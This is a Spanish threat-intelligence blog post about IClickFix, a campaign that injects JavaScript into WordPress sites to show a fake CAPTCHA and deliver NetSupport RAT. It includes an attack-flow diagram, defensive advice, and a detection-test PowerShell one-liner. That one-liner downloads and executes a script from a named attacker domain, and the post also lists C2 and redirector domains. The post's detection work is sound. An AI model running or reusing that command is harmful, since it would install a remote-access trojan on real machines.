SOC Prime Bias: Medio

03 Feb 2026 21:25
newspaper icon Blog de Sekoia.io

Conozca IClickFix: un marco de trabajo extendido dirigido a WordPress utilizando la táctica ClickFix

Author Photo
Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime linkedin icon Seguir
Conozca IClickFix: un marco de trabajo extendido dirigido a WordPress utilizando la táctica ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

El informe perfila IClickFix, un marco de JavaScript malicioso que compromete sitios de WordPress y presenta un CAPTCHA falso al estilo de Cloudflare Turnstile. El señuelo coacciona a los visitantes a ejecutar un comando de PowerShell que descarga e instala NetSupport RAT. La entrega está respaldada por un sistema de distribución de tráfico construido alrededor del acortador de URL YOURLS y un conjunto rotativo de dominios de redireccionamiento. Los investigadores observaron más de 3,800 sitios de WordPress comprometidos que sirvieron esta cadena a nivel mundial desde finales de 2024.

Investigación

Los analistas de Sekoia identificaron la etiqueta de JavaScript inyectado ic-tracker-js en sitios comprometidos, luego reconstruyeron el flujo de redirección a través de múltiples dominios de corta duración. Capturaron el patrón exacto de ejecución de PowerShell utilizado para recuperar la carga final y recuperaron los componentes de NetSupport RAT caídos junto con indicadores de infraestructura C2 asociados.

Mitigación

Monitorear el contenido web para la ic-tracker-js inyección y bloquear dominios maliciosos conocidos, redireccionadores y servicios de enlace corto utilizados en la cadena. En los endpoints, detectar patrones de descarga y ejecución de PowerShell consistentes con el señuelo ClickFix. Añadir cobertura para la creación de archivos del cliente NetSupport y para persistencia a través de Run claves de registro a nivel de usuario.

Respuesta

Cuando aparezcan indicadores, aislar el endpoint, detener el proceso activo de PowerShell y eliminar los binarios de NetSupport junto con cualquier persistencia basada en el registro. Continuar con una triage forense completo para confirmar que el atacante no desplegó implantes adicionales ni estableció rutas de acceso secundarias.

graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#cccccc %% Action Nodes action_initial_access[«<b>Acción</b> – <b>T1190 Explotación de Aplicación Pública</b><br/>Compromiso de sitios WordPress explotando vulnerabilidades del núcleo o de plugins populares (Elementor, WooCommerce, Gravity Forms).»] class action_initial_access action action_content_injection[«<b>Acción</b> – <b>T1659 Inyección de Contenido</b><br/>Inyección de JavaScript malicioso que contiene la etiqueta <i>icu2011trackeru2011js</i> en páginas comprometidas para cargar scripts controlados por el atacante.»] class action_content_injection action action_software_extensions[«<b>Acción</b> – <b>T1176 Extensiones de Software</b><br/>Uso de plugins vulnerables de WordPress como extensiones para persistir el código malicioso en el sitio.»] class action_software_extensions action action_dynamic_resolution[«<b>Acción</b> – <b>T1568 Resolución Dinámica</b><br/>Uso del acortador YOURLS y una cadena de dominios (por ejemplo, ksfldfklskdmbxcvb.com) para resolver y entregar cargas útiles mientras se filtran bots.»] class action_dynamic_resolution action action_obfuscated_payloads[«<b>Acción</b> – <b>T1027 Archivos Ofuscados o Almacenados</b><br/>Codificación del JavaScript de primera etapa y del cargador PowerShell con Base64 y segmentación de cadenas para evadir la detección.»] class action_obfuscated_payloads action action_user_execution[«<b>Acción</b> – <b>T1204.001 Ejecución por el Usuario: Enlace Malicioso</b><br/>Las víctimas hacen clic en la URL de WordPress comprometida, activando la cadena de redirección.»] class action_user_execution action action_input_injection[«<b>Acción</b> – <b>T1674 Inyección de Entrada y T1204.004 Copiar-Pegar Malicioso</b><br/>JavaScript escribe un comando PowerShell en el portapapeles y muestra un señuelo falso de CAPTCHA Cloudflare Turnstile.»] class action_input_injection action action_powershell[«<b>Acción</b> – <b>T1059.001 PowerShell</b><br/>Un comando PowerShell oculto se ejecuta, descarga el script de segunda etapa <i>tytuy.json</i> y despliega NetSupport RAT.»] class action_powershell action action_persistence[«<b>Acción</b> – <b>T1547.014 Ejecución Automática al Inicio o Inicio de Sesión: Active Setup</b><br/>Creación de una clave de registro Run que apunta a <i>client32.exe</i> en ProgramData\\S1kCMNfZi3, asegurando la ejecución al inicio.»] class action_persistence action action_c2[«<b>Acción</b> – <b>T1102.002 Servicio Web: Comunicación Bidireccional</b><br/>NetSupport RAT se comunica a través de HTTPS con dominios controlados por el atacante (por ejemplo, nightlomsknies.com/fakeurl.htm).»] class action_c2 action action_data_obfuscation[«<b>Acción</b> – <b>T1001 Ofuscación de Datos</b><br/>Ofuscación del tráfico de comando y control y de las cargas útiles para ocultar la actividad maliciosa.»] class action_data_obfuscation action %% Tool / Malware / File Nodes tool_wordpress_core[«<b>Herramienta</b> – <b>Nombre</b>: Núcleo de WordPress<br/><b>Vulnerabilidad</b>: Ejecución remota de código»] class tool_wordpress_core tool tool_elementor_plugin[«<b>Herramienta</b> – <b>Nombre</b>: Plugin Elementor<br/><b>Vulnerabilidad</b>: Ejecución remota de código específica de CVE»] class tool_elementor_plugin tool tool_yourls[«<b>Herramienta</b> – <b>Nombre</b>: Acortador YOURLS<br/><b>Propósito</b>: Redirección de URL y resolución dinámica»] class tool_yourls tool malware_netsupport[«<b>Malware</b> – <b>Nombre</b>: NetSupport RAT<br/><b>Capacidad</b>: Control remoto y exfiltración de datos»] class malware_netsupport malware file_client32[«<b>Archivo</b> – <b>Nombre</b>: client32.exe<br/><b>Ubicación</b>: ProgramData\\S1kCMNfZi3»] class file_client32 file file_tyuy_json[«<b>Archivo</b> – <b>Nombre</b>: tytuy.json<br/><b>Propósito</b>: Script PowerShell de segunda etapa»] class file_tyuy_json file %% Connections action_initial_access –>|explota| tool_wordpress_core tool_wordpress_core –>|proporciona acceso| action_content_injection action_content_injection –>|inyecta script usando| tool_elementor_plugin action_content_injection –>|conduce a| action_software_extensions action_software_extensions –>|persiste mediante| tool_elementor_plugin action_software_extensions –>|habilita| action_dynamic_resolution action_dynamic_resolution –>|utiliza| tool_yourls action_dynamic_resolution –>|entrega| action_obfuscated_payloads action_obfuscated_payloads –>|produce| action_user_execution action_user_execution –>|activa| action_input_injection action_input_injection –>|escribe comando en el portapapeles| action_powershell action_powershell –>|descarga| file_tyuy_json file_tyuy_json –>|instala| malware_netsupport malware_netsupport –>|instala| action_persistence action_persistence –>|crea| file_client32 file_client32 –>|ejecutado al inicio| action_c2 malware_netsupport –>|se comunica con| action_c2 action_c2 –>|usa| action_data_obfuscation

Flujo de Ataque

Ejecución de Simulación

Requisito previo: El chequeo de Telemetría y Línea de Base previo al vuelo debe haber pasado.

  • Narrativa y Comandos de Ataque:

    Un adversario que tiene acceso inicial al endpoint desea establecer un punto de apoyo persistente entregando el NetSupport RAT. Para evadir la detección interactiva, lanzan PowerShell en modo oculto sin perfil ni logotipo (-w hidden -nop -c). Luego usan Invoke‑WebRequest (iwr) para descargar una carga maliciosa en JSON (tytuy.json) que contiene un script de PowerShell para el RAT. El script se escribe en el directorio temporal y se ejecuta a través de Invoke‑Expression. Esta línea de comando exacta coincide con las cadenas que la regla Sigma monitorea.

  • Script de Prueba de Regresión:

    # Comando en una línea de PowerShell que coincide con la regla de detección
$url = 'https://scottvmorton.com/tytuy.json'
$out = "$env:TEMPpayload.ps1"

powershell -w hidden -nop -c "iwr '$url' -OutFile $out; iex (Get-Content $out -Raw)"

  • Comandos de Limpieza:

    # Eliminar la carga descargada y cualquier proceso de PowerShell restante
Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue
Get-Process -Name powershell | Where-Object {$_.CommandLine -match 'tytuy.json'} | Stop-Process -Force

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis